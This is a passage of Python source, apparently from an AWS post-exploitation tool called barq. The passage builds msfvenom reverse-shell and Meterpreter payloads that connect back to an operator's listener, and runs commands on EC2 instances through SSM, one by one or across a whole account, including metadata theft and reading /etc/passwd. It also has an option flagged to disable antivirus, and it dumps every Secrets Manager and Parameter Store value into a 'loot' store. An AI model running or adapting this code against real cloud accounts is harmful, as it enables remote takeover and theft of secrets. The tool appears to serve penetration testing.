puts(colored.magenta(msfconsole_cmd))
windowsattack = os.popen(windowsmsfshell).read()
return linuxattack, windowsattack
def metasploit_installed_options(host, port, OS):
"""
Prompts for metasploit options against an EC2 instance depending on its OS.
:param host: IP or hostname of the listening server running metasploit exploit handler.
:param port: The port the exploit handler is listening on.
:param OS: The OS of the target instance
:return: Tuple of reverse shell payloads for linux and windows.
"""
puts(color('[*] Choose your metasploit payload. This requires msfvenom to be installed in your system.'))
#output = os.popen("msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.10.10 LPORT=4444 -f psh --smallest").read()
linux_tcp_meterpreterx64 = 'python/meterpreter/reverse_tcp'
linux_https_meterpreterx64 = 'python/meterpreter/reverse_https'
linux_tcp_shell = 'python/shell_reverse_tcp'
windows_tcp_meterpreterx64 = 'windows/x64/meterpreter/reverse_tcp'
windows_https_meterpreterx64 = 'windows/x64/meterpreter/reverse_https'
windows_tcp_shell = 'windows/x64/shell/reverse_tcp'
if OS == 'linux':
action = 'AWS-RunShellScript'
shell_options = [{'selector':'1','prompt':'Linux Meterpreter reverse TCP x64','return':linux_tcp_meterpreterx64},
{'selector':'2','prompt':'Linux Meterpreter reverse HTTPS x64','return':linux_https_meterpreterx64},
{'selector':'3','prompt':'Linux TCP Shell','return':linux_tcp_shell}]
else:
action = 'AWS-RunPowerShellScript'
shell_options = [{'selector':'1','prompt':'Windows Meterpreter reverse TCP x64','return':windows_tcp_meterpreterx64},{'selector':'2','prompt':'Windows Meterpreter reverse HTTPS x64','return':windows_https_meterpreterx64},
{'selector':'3','prompt':'Windows TCP Shell','return':windows_tcp_shell}]
payload = prompt.options('Payload:', shell_options)
if OS == 'linux':
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s -f raw --smallest' %(payload,host, port)
else:
msfshell = 'msfvenom -p %s LHOST=%s LPORT=%s -f psh-net --smallest' %(payload, host, port)
puts(color('[*] Run the following command on your reverse server running the handler:'))
msfconsole_cmd = "msfconsole -x 'use exploit/multi/handler; set LHOST %s; set lport %s; set payload %s;run -j;'" %(host, port, payload)
puts(colored.magenta(msfconsole_cmd))
shellcode = os.popen(msfshell).read()
if OS == 'linux':
shellcode = "python -c \"%s\"" %shellcode
return shellcode, action
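# Illustrative example (values are placeholders, not produced by the tool itself): for a
# listener at 198.51.100.10:4444 and the python/meterpreter/reverse_tcp payload, the two
# commands built above come out roughly as:
#   msfvenom -p python/meterpreter/reverse_tcp LHOST=198.51.100.10 LPORT=4444 -f raw --smallest
#   msfconsole -x 'use exploit/multi/handler; set LHOST 198.51.100.10; set lport 4444; set payload python/meterpreter/reverse_tcp;run -j;'
# The first runs locally to generate the shellcode; the second is printed for the operator to
# start the matching handler on the listening server.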
def start_training_mode(caller):
"""
Start the training mode.
:param caller: menu that called this function
:return: None
"""
global my_aws_creds
mysession = ''
try:
mysession = my_aws_creds['session']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2resource = mysession.resource('ec2')
iamresource = mysession.resource('iam')
ssmclient = mysession.client('ssm')
iamclient = mysession.client('iam')
ec2client = mysession.client('ec2')
with indent(6, quote=">>>>"):
puts(color('[*] Training mode entered'))
puts(color('[..] preparing environment....'))
AssumeRolePolicydata = {'Version': '2012-10-17','Statement': {'Effect': 'Allow','Principal': {'Service': 'ec2.amazonaws.com'},'Action': 'sts:AssumeRole'}}
puts(color('[..] Creating Assume Role Policy...'))
rolename = 'role'+ id_generator()
puts(color('[..] Creating role with name: %s'%rolename))
role = iamresource.create_role(RoleName=rolename,AssumeRolePolicyDocument=json.dumps(AssumeRolePolicydata))
puts(color("[+] Role created successfully."))
puts(color('[..] Attaching needed policies for role...'))
responseforrole = iamclient.attach_role_policy(RoleName=role.name, PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
puts(color('[+] Role attached successfully to policy AmazonEC2RoleforSSM'))
puts(color('[..] Creating EC2 instance profile and adding it to role...'))
instance_profile = iamresource.create_instance_profile(InstanceProfileName=role.name)
instance_profile.add_role(RoleName=role.name)
OS,amznlnxaminame = choose_training_ami()
puts(color('[+] OS chosen is: %s'%OS))
#"amzn2-ami-hvm-2.0.20190115-x86_64-gp2" #"amzn-ami-hvm-2018.03.0.20180811-x86_64-ebs"
puts(color('[+] Amazon AMI used is: %s'%amznlnxaminame))
ami_images = list(ec2resource.images.filter(Filters=[{'Name':'name','Values':[amznlnxaminame,]}]))
amznamiid = ami_images[0].image_id
puts(color('[..] Now creating EC2 instance of type t2.micro with this AMI....'))
time.sleep(10)
newinstances = ec2resource.create_instances(ImageId=amznamiid, InstanceType='t2.micro',MinCount=1,MaxCount=1, IamInstanceProfile={'Name':role.name})
newinstance = newinstances[0]
puts(color('[+] EC2 instance id is: %s'%newinstance.id))
puts(color('[..] Waiting for EC2 instance to complete running..... This will take a while'))
newinstance.wait_until_running()
newinstance.reload()
puts(color('[+] EC2 instance state is: %s'%newinstance.state))
payload,action, disableav = shellscript_options(OS)
puts(color('[..] Sending the command "%s" to the running instance....'%payload))
instanceid = newinstance.id
time.sleep(10)
if OS == 'linux':
success = run_linux_command(ssmclient,instanceid,action,payload)
else:
puts(color('[..] Waiting for Windows EC2 instance to be ready... waiting for 2 minutes...'))
time.sleep(120)
success = run_windows_command(ssmclient,instanceid, action, payload, disableav)
#########
#########
puts(color('[+] Training mode done... Now terminating EC2 instance and deleting IAM role...'))
newinstance.terminate()
puts(color('[..] Waiting for instance to be terminated...'))
newinstance.wait_until_terminated()
puts(color('[+] EC2 instance terminated. Now detaching policy and deleting role...'))
instance_profile.remove_role(RoleName=role.name)
instance_profile.delete()
role.detach_policy(PolicyArn='arn:aws:iam::aws:policy/service-role/AmazonEC2RoleforSSM')
role.delete()
puts(color('[+] Done!'))
go_to_menu(caller)
def process_training_command(command):
"""
Process command in the training menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
training_help()
elif command == 'where':
puts(colored.green("You are in training menu"))
elif command == 'setprofile':
set_aws_creds('training')
elif command == 'start':
start_training_mode('training')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'showprofile':
show_aws_creds('training')
elif command == 'exit':
exit()
training_loop()
""" pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
"""
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
def instanceidcomplete(text, state):
"""
Auto complete for Instance ID table.
"""
global INSTANCESIDCOMMANDS
for cmd in INSTANCESIDCOMMANDS:
if cmd.startswith(text):
if not state:
return cmd
else:
state -= 1
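# Usage sketch (mirrors the wiring done in the menus below, e.g. get_instance_details):
#   readline.set_completer_delims(' \t\n;')
#   readline.parse_and_bind("tab: complete")
#   readline.set_completer(instanceidcomplete)
# Tab completion only returns ids after INSTANCESIDCOMMANDS has been filled with the
# discovered EC2 instance ids.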
def get_instance_details(caller):
"""
Return detailed info in JSON format about a particular instance.
:param caller: The menu that called this function.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances (run attacksurface for an updated list):'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
INSTANCESIDCOMMANDS.append(ins['id'])
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
region = ''
for ins in ec2instances['instances']:
if ins['id'] == target:
region = ins['region']
break
ec2client = mysession.client('ec2',region_name=region)
result = ec2client.describe_instances(InstanceIds=[target,])
jsonstr = json.dumps(result['Reservations'][0]['Instances'][0],indent=4, sort_keys=True, default=str)
print(highlight(jsonstr, JsonLexer(), TerminalFormatter()))
go_to_menu(caller)
def process_instances_command(command):
"""
Process command in the EC2 instances menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
instances_help()
elif command == 'where':
puts(colored.green("You are in EC2 instances menu"))
elif command == 'setprofile':
set_aws_creds('ec2instances')
elif command == 'showprofile':
show_aws_creds('ec2instances')
elif command == 'dumpsecrets':
find_all_creds('ec2instances')
elif command == 'attacksurface':
find_attacksurface('ec2instances')
elif command == 'showsecrets':
show_cred_loot('ec2instances')
elif command == 'securitygroups':
get_security_groups('ec2instances')
elif command == 'ec2attacks':
ec2attacks('ec2instances')
elif command == 'back':
#handle_menu()
menu_backward()
elif command == 'list':
get_ec2_instances('ec2instances')
elif command == 'showsecrets':
show_aws_creds('ec2instances')
elif command == 'commandresults':
check_command_invocations('ec2instances')
elif command == 'instance':
get_instance_details('ec2instances')
elif command == 'exit':
exit()
instances_loop()
def instances_loop():
"""
The command handler loop for the EC2 instances menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instancecomplete)
command = raw_input('barq '+color('instances','blue')+' > ')
except Exception as e:
print(e)
command = str(command)
process_instances_command(command)
except KeyboardInterrupt as k:
print("CTRL+C pressed.")
choice = prompt.query(color("Are you sure you want to go back to the main menu? Y/N",'red'), default='Y')
if choice == 'Y':
menu_backward()
else:
instances_loop()
def main_loop():
"""
The command handler loop for the main menu. Commands will be sent to the processor and the prompt will be displayed.
:return: None
"""
try:
command = ''
while command == '':
try:
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(maincomplete)
command = raw_input('barq '+color('main','green')+' > ')
except Exception as e:
exit()
#command = prompt.query('aws sheller main> ', validators=[])
command = str(command)
process_main_command(command)
except KeyboardInterrupt as k:
print(color("CTRL+C pressed. Exiting...",'red'))
exit()
def process_main_command(command):
"""
Process command in the main menu.
:param command: The command to process.
:return: None
"""
global menu_stack
if command == 'help':
main_help()
elif command == 'where':
puts(colored.green('You are in the main menu'))
elif command == 'back':
puts(colored.green('You are at the top menu.'))
elif command == 'exit':
#cleanup tasks
try:
exit()
except:
pass
elif command == 'setprofile':
set_aws_creds('main')
elif command == 'showprofile':
show_aws_creds('main')
elif command == 'dumpsecrets':
find_all_creds('main')
elif command == 'attacksurface':
find_attacksurface('main')
elif command == 'showsecrets':
show_cred_loot('main')
elif command == 'securitygroups':
get_security_groups('main')
elif command == 'training':
#menu_stack.append('training')
#handle_menu()
menu_forward('training')
elif command == 'ec2instances':
menu_forward('ec2instances')
main_loop()
def find_all_creds(caller):
"""
Find Secrets and Parameters stored in AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to.
:return: None
"""
global my_aws_creds
global loot_creds
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
loot_creds = {'secrets':[],'tokens':[],'parameters':[]}
puts(color('[..] Now iterating over all regions to get secrets and parameters...'))
for region in possible_regions:
puts(color('[*] Region currently searched for secrets: %s'%region))
puts(color('[..] Now searching for secrets in Secret Manager'))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
#mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],
aws_secret_access_key=my_aws_creds['aws_secret_access_key'],
region_name=region, aws_session_token=my_aws_creds['aws_session_token'])
secretsclient = mysession.client(service_name='secretsmanager',region_name=region)
try:
secrets = secretsclient.list_secrets()['SecretList']
secretnames = []
for secret in secrets:
secretnames.append(secret['Name'])
for name in secretnames:
resp = secretsclient.get_secret_value(SecretId=name)
puts(colored.magenta("Secret Name: %s" %name))
puts(colored.magenta("Secret Value: %s" %resp['SecretString']))
resp2 = secretsclient.describe_secret(SecretId=name)
description = resp2.get('Description','')
loot_creds['secrets'].append({'name':name,'value':resp['SecretString'],'description':description})
except Exception as e:
print(e)
puts(color('[!] No secrets in this region\'s Secret Manager...'))
puts(color('[..] Now searching for secrets in Parameter Store'))
ssmclient = mysession.client('ssm',region_name=region)
try:
paramresponse = ssmclient.describe_parameters()
paramnames = []
for param in paramresponse.get('Parameters',[]):
if param.get('Name','') != '':
paramnames.append(param.get('Name'))
if len(paramnames) > 0:
getparamsresponse = ssmclient.get_parameters(Names=paramnames,WithDecryption=True).get('Parameters')
for getparam in getparamsresponse:
puts(colored.magenta("Parameter Name: %s, Parameter Value: %s" %(getparam['Name'], getparam['Value'])))
loot_creds['parameters'].append({'name':getparam['Name'],'value':getparam['Value']})
except Exception as e:
print(e)
puts(color('[!] No Parameters in this region\'s Parameter Store...'))
puts(color("[+] Done iterating on AWS secrets and parameters."))
go_to_menu(caller)
def show_cred_loot(caller):
"""
Show Secrets and Parameters looted from AWS Secrets Manager or Systems Manager Parameter store, respectively, for each region.
:param caller: calling menu to return to
:return: None
"""
global loot_creds
try:
if len(loot_creds.get('secrets')) < 1:
puts(color('[!] You have no stored secrets or parameters. Run the command dumpsecrets to collect them'))
go_to_menu(caller)
puts(color('[*] Your collected secrets and credentials:'))
for secret in loot_creds['secrets']:
puts(color("===========",'blue'))
puts(color('[+] Name: %s'%secret.get('name')))
puts(color('[+] Value: %s' % secret.get('value')))
puts(color('[+] Description: %s' % secret.get('description')))
#puts(colored.green('name: %s, value: %s, description: %s'%(secret.get('name'),secret.get('value'), secret.get('description',''))))
for param in loot_creds['parameters']:
puts(color("===========", 'blue'))
puts(color('[+] Name: %s' % param.get('name')))
puts(color('[+] Value: %s' % param.get('value')))
#puts(colored.green('name: %s, value: %s'%(param.get('name'),param.get('value'))))
except Exception as e:
print(e)
puts(color('[!] A problem occurred while reading stored secrets or parameters. Run the command dumpsecrets to collect them'))
go_to_menu(caller)
def get_ec2_instances(caller):
"""
List discovered EC2 instances.
:param caller: Calling menu to return to.
:return: None
"""
global ec2instances
try:
puts(color('[*] Your collected EC2 instances (run attacksurface for an updated list):'))
instances_table = PrettyTable()
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name',
'Profile']
for ins in ec2instances['instances']:
instances_table.add_row([ins.get('id'), ins.get('platform'), ins.get('region'), ins.get('state'),
ins.get('public_ip_address'),
ins.get('public_dns_name'), ins.get('iam_profile', '')])
print(instances_table)
except:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
def get_security_groups(caller):
"""
List security groups discovered.
:param caller: calling menu to return to.
:return: None
"""
global secgroups
try:
puts(color('[*] Your collected security groups (run attacksurface for an updated list):'))
for group in secgroups['groups']:
puts(colored.green("Group ID: %s"%group.get('id','')))
puts(colored.green("Group description: %s"%group.get('description','')))
puts(colored.green('Group Ingress IP permissions:'))
for p in group['ip_permissions']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.green('Group Egress IP permissions:'))
for p in group['ip_permissions_egress']:
ranges = ''
for iprange in p.get('ranges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
puts(colored.green('From Port: %s, To Port: %s, Protocol: %s, IP Ranges: %s' %(p.get('fromport','Any'),p.get('toport','Any'),p.get('protocol','All'),ranges)))
puts(colored.magenta('======================================='))
except Exception as e:
print(e)
puts(color('[!] You have no stored security groups. Run the command attacksurface to discover them'))
go_to_menu(caller)
def ec2attacks(caller):
"""
Perform various attacks against All eligible EC2 instances in the account, or choose a single EC2 instance to attack.
:param caller: Calling menu to return to.
:return: None
"""
global my_aws_creds
global ec2instances
global INSTANCESIDCOMMANDS
INSTANCESIDCOMMANDS = []
mysession = ''
linux = False
windows = False
actual_targets = []
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No EC2 credentials set. Call setprofile first!"))
go_to_menu(caller)
try:
puts(color('[*] Your collected EC2 instances (run attacksurface for an updated list):'))
instances_table = PrettyTable()
possible_regions = []
instances_table.field_names = ['Instance ID', 'Platform', 'Region', 'State', 'Public IP', 'Public DNS name', 'Profile']
if len(ec2instances['instances']) == 0:
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
for ins in ec2instances['instances']:
if ins.get('iam_profile','') != '' and ins.get('state','') == 'running':
instances_table.add_row([ins.get('id'),ins.get('platform'),ins.get('region'),ins.get('state'),ins.get('public_ip_address'),
ins.get('public_dns_name'),ins.get('iam_profile','')])
actual_targets.append(ins)
INSTANCESIDCOMMANDS.append(ins['id'])
if ins.get('platform') == 'linux':
linux = True
else:
windows = True
except Exception as e:
print(e)
puts(color('[!] You have no stored EC2 instances. Run the command attacksurface to discover them'))
go_to_menu(caller)
print(instances_table)
puts(color('[*] Target Options:'))
target_options = [{'selector':'1','prompt':'All EC2 instances','return':'all'},
{'selector':'2', 'prompt':'Single EC2 instance', 'return':'single'}]
target = prompt.options('Choose your target:', target_options)
if target == 'single':
#paster
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind("tab: complete")
readline.set_completer(instanceidcomplete)
target = prompt.query('Type/Paste your target EC2 ID:')
if target == "all":
agree = prompt.query('This will launch the same attack on all EC2 instances. This is a very risky move! Do you want to proceed? Y/N?', default="N")
if agree != 'Y':
go_to_menu(caller)
puts(color('[*] EC2 Attack List:'))
attack_options = [{'selector':'1','prompt':'Download EC2 metadata and userdata (custom init script)','return':'metadata'},
{'selector':'2', 'prompt':'Display a file', 'return':'printfile'},
{'selector':'3','prompt':'Visit a URL from inside EC2 instance','return':'URL'},
{'selector':'4','prompt':'metasploit','return':'msf'},
{'selector':'5','prompt':'Run a command','return':'command'},
{'selector':'6','prompt':'Reverse Shell to external server','return':'reverseshell'}]
attack = prompt.options('Choose your attack mode:', attack_options)
if target != 'all':
success = attack_single_target(caller,target, attack)
elif target == "all":
targets = actual_targets
success = attack_multiple_targets(mysession,caller,targets, attack, linux, windows)
puts(color('[+] Done launching attacks. Check command results with commandresults option.'))
go_to_menu(caller)
def attack_single_target(caller,target, attack):
"""
Launch an attack on a single EC2 instance.
:param caller: Calling menu to return to.
:param target: Target EC2 instance id
:param attack: The attack to launch.
:return: True
"""
global ec2instances
target_id = ''
target_platform = ''
target_state = ''
target_region = ''
disableav = False
for ins in ec2instances['instances']:
if ins.get('id') == target:
target_id = target
target_platform = ins.get('platform')
target_state = ins.get('state')
target_region = ins.get('region')
if target_state != 'running':
puts(color('[!] The chosen target is not running! Exiting...'))
go_to_menu(caller)
if target_platform == 'linux':
action = 'AWS-RunShellScript'
else:
action = 'AWS-RunPowerShellScript'
remote_ip_host = ''
remote_port = ''
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('You chose %s option. First provide your remote IP and port to explore shell options.' %attack))
remote_ip_host = prompt.query('Your remote IP or hostname to connect back to:')
remote_port = prompt.query("Your remote port number:", default="4444")
if attack == "reverseshell":
attack, action = reverseshell_options(remote_ip_host, remote_port, target_platform)
elif attack == "msf":
attack, action = metasploit_installed_options(remote_ip_host, remote_port, target_platform)
disableav = True
elif attack == 'URL':
puts(color('[*] Choose the URL to visit from inside the EC2 instance:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
if target_platform == 'linux':
attack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
else:
attack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
if target_platform == 'linux':
attack = PRINT_EC2_METADATA_CMD
else:
attack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
filepath = prompt.query('Enter the full file path: ', default="/etc/passwd")
attack = "cat %s" %filepath
elif attack == "command":
attack = prompt.query('Enter the full command to run: (bash for Linux - Powershell for Windows)', default="cat /etc/passwd")
disableav = True
puts(colored.cyan('Sending the command "%s" to the target instance %s....'%(attack,target)))
mysession = set_session_region(target_region)
ssmclient = mysession.client('ssm')
if target_platform == 'linux':
success = run_linux_command(ssmclient,target,action,attack)
else:
success = run_windows_command(ssmclient,target, action, attack, disableav)
return True
def attack_multiple_targets(mysession,caller,targets, attack, linux, windows):
"""
Launch commands against multiple EC2 instances
:param mysession: boto3 session object.
:param caller: calling menu to return to.
:param targets: List of target EC2 instances
:param attack: The attack/command type
:param linux: Whether or not Linux is included in the targets.
:param windows: Whether or not Windows is included in the targets.
:return: None
"""
global command_invocations
global logger
windowsaction = 'AWS-RunPowerShellScript'
linuxaction = 'AWS-RunShellScript'
disableav = False
if attack == "reverseshell" or attack == "msf":
puts(colored.magenta('Make sure your shell listener tool can handle multiple simultaneous connections!'))
disableav = True
if attack == "reverseshell":
linuxattack, windowsattack = reverseshell_multiple_options(linux, windows)
elif attack == "msf":
linuxattack, windowsattack = metasploit_installed_multiple_options(linux, windows)
elif attack == "URL":
puts(color('[*] Choose the URL to visit from inside the EC2 instances:'))
URL = prompt.query('URL: ', default="http://169.254.169.254/latest/")
linuxattack = "python -c \"import requests; print requests.get('%s').text;\"" %URL
windowsattack = "echo (Invoke-WebRequest -UseBasicParsing -Uri ('%s')).Content;" %URL
elif attack == "metadata":
linuxattack = PRINT_EC2_METADATA_CMD
windowsattack = PRINT_EC2_METADATA_PSH
elif attack == "printfile":
linuxfilepath = prompt.query('(Ignore if Linux is not targeted) Enter the full file path for Linux instances: ', default="/etc/passwd")
windowsfilepath = prompt.query('(Ignore if Windows is not targeted) Enter the full file path for Windows instances: ', default="C:\\Windows\\System32\\drivers\\etc\\hosts")
linuxattack = "cat %s" %linuxfilepath
windowsattack = "cat %s" %windowsfilepath
elif attack == "command":
linuxattack = prompt.query('(Ignore if Linux is not targeted) Enter the full bash command to run: ', default="whoami")
windowsattack = prompt.query('(Ignore if Windows is not targeted) Enter the full Powershell command to run: ', default="whoami")
disableav = True
logger.error("before running threaded attacks")
for target in targets:
if target['platform'] == 'linux' and linux and target.get('iam_profile','') != '' and linuxattack != '':
#run_threaded_linux_command(mysession,target,linuxaction,linuxattack)
logger.error("running run_threaded_linux_command for %s" %target['id'])
linuxthread = Thread(target=run_threaded_linux_command, args=(mysession, target,linuxaction,linuxattack))
linuxthread.start()
logger.error("after running run_threaded_linux_command for %s" % target['id'])
if target['platform'] == 'windows' and windows and target.get('iam_profile','') != '' and windowsattack != '':
logger.error("running run_threaded_windows_command for %s" % target['id'])
#run_threaded_windows_command(mysession,target,windowsaction,windowsattack)
windowsthread = Thread(target=run_threaded_windows_command, args=(mysession, target,windowsaction,windowsattack,disableav))
windowsthread.start()
logger.error("after run_threaded_windows_command for %s" % target['id'])
#TODO: Decide best approach to launching and looping
#loop over instances launching attack against each
#loop over results.
def check_command_invocations(caller):
"""
Check stored results of previously executed attacks on EC2 instances.
:param caller: calling menu
:return: None
"""
global command_invocations
if len(command_invocations['commands']) < 1:
puts(color('[!] You haven\'t run any commands against EC2 targets yet. Run ec2attacks to launch commands.'))
go_to_menu(caller)
for command in command_invocations['commands']:
puts(colored.green('command id: %s'%command.get('id') ))
puts(colored.green('command instance id: %s'%command.get('instanceid') ))
puts(colored.green('command state: %s'%command.get('state')))
puts(colored.green('command platform: %s'%command.get('platform')))
puts(colored.green('command region: %s'%command.get('region') ))
try:
puts(colored.green('command error: %s'%command.get('error','No errors')[0:5000]))
except:
pass
try:
puts(colored.green('command output: %s'%command.get('output', 'No output')[0:5000] ))
except:
pass
puts(colored.magenta('======================================='))
def find_attacksurface(caller):
"""
Find the attack surface of this AWS account. Currently looks for EC2 instances and Security Groups.
:param caller: calling menu
:return: None
"""
global my_aws_creds
global ec2instances
global secgroups
global lambdafunctions
mysession = ''
try:
mysession = my_aws_creds['session']
possible_regions = my_aws_creds['possible_regions']
except:
puts(color("[!] Error! No AWS credentials set. Call setprofile first!"))
go_to_menu(caller)
ec2instances = {'instances':[]}
secgroups = {'groups':[]}
lambdafunctions = {'functions':[]}
puts(color('[..] Now iterating over all regions to discover public attack surface...'))
for region in possible_regions:
puts(color('[*] Region currently searched for details: %s'%region))
#if my_aws_creds['aws_session_token'] == '':
# mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region)
#else:
mysession = boto3.session.Session(aws_access_key_id=my_aws_creds['aws_access_key_id'],aws_secret_access_key=my_aws_creds['aws_secret_access_key'],region_name=region,aws_session_token=my_aws_creds['aws_session_token'])
ec2resource = mysession.resource('ec2')
lambdaclient = mysession.client('lambda')
instances = ec2resource.instances.all()
puts(color('[..] Now searching for details of EC2 instances'))
for instance in instances:
puts(color('[..] Now checking instance with id: %s'%instance.instance_id))
puts(color('[+] Public host name: %s'%instance.public_dns_name))
puts(color('[+] Public IP: %s'%instance.public_ip_address))
platform = ''
if instance.platform == "windows":
platform = 'windows'
puts(color('[+] OS is: Windows'))
else:
platform = 'linux'
puts(color('[+] OS is: Linux'))
puts(color('[+] AMI id: %s'%instance.image_id))
puts(color('[+] State: %s'%instance.state['Name']))
puts(color('[+] Region: %s'%region))
profile = instance.iam_instance_profile
if profile:
profile = profile['Arn'].rsplit('/',1)[-1]
else:
profile = ''
puts(colored.magenta(''))
ec2instances['instances'].append({'id':instance.instance_id,'public_dns_name':instance.public_dns_name,'public_ip_address':instance.public_ip_address,
'platform':platform,'ami_id':instance.image_id,'state':instance.state['Name'],'region':region,'iam_profile':profile})
puts(color('[..] Now searching for details of security groups'))
security_groups = ec2resource.security_groups.all()
for group in security_groups:
thisgroup = {}
thisgroup['description'] = group.description
thisgroup['id'] = group.id
puts(colored.magenta("group id: %s" %group.id))
puts(colored.magenta( "group ip permissions"))
ip_permissions = []
for rule in group.ip_permissions:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
if protocol == '-1':  # AWS uses '-1' to mean "all protocols"
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Ingress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
puts(colored.magenta( "group ip permissions egress"))
ip_permissions_egress = []
for rule in group.ip_permissions_egress:
ranges = ''
for iprange in rule.get('IpRanges',[]):
ranges = ranges + '%s,' %iprange['CidrIp']
if len(ranges) > 1 and ranges[-1] == ',':
ranges = ranges[:-1]
if ranges == '':
ranges = 'None'
protocol = rule.get('IpProtocol')
if protocol == '-1':  # AWS uses '-1' to mean "all protocols"
protocol = 'All'
fromport = rule.get('FromPort','Any')
toport = rule.get('ToPort','Any')
puts(colored.magenta( "Ingress Rule: fromport: %s, toport: %s, protocol: %s, IP ranges: %s" %(fromport,toport,protocol,ranges)))
ip_permissions_egress.append({'protocol':protocol,'fromport':fromport, 'toport':toport,'ranges':rule.get('IpRanges',[])})
thisgroup['ip_permissions'] = ip_permissions
thisgroup['ip_permissions_egress'] = ip_permissions_egress
secgroups['groups'].append(thisgroup)
puts(color('[..] Now searching for details of lambda functions'))
function_results = lambdaclient.list_functions()
functions = function_results['Functions']
for function in functions:
function_name = function['FunctionName']
function_arn = function['FunctionArn']
function_runtime = function.get('Runtime','')
function_role = function.get('Role','')
function_description = function.get('Description','')
function_Environment = function.get('Environment',{})
puts(color('[+] Function Name: %s'%function_name))
puts(color('[+] Function ARN: %s'%function_arn))
puts(color('[+] Function Runtime: %s'%function_runtime))
puts(color('[+] Function Role: %s'%function_role))
puts(color('[+] Function Description: %s'%function_description))
puts(color('[+] Function Environment variables: %s'%function_Environment))
lambdafunctions['functions'].append({'name':function_name,'function_arn':function_arn,'function_runtime':function_runtime,
'function_role':function_role,'function_description':function_description,'function_Environment':function_Environment,'region':region})
go_to_menu(caller)
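# Sketch of the data this function collects (keys taken from the appends above; values are
# made-up examples):
#   ec2instances    = {'instances': [{'id': 'i-0123456789abcdef0', 'platform': 'linux',
#                                     'state': 'running', 'region': 'us-west-2',
#                                     'public_ip_address': '...', 'public_dns_name': '...',
#                                     'ami_id': '...', 'iam_profile': '...'}]}
#   secgroups       = {'groups': [{'id': 'sg-...', 'description': '...',
#                                  'ip_permissions': [...], 'ip_permissions_egress': [...]}]}
#   lambdafunctions = {'functions': [{'name': '...', 'function_arn': '...', 'region': '...'}]}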
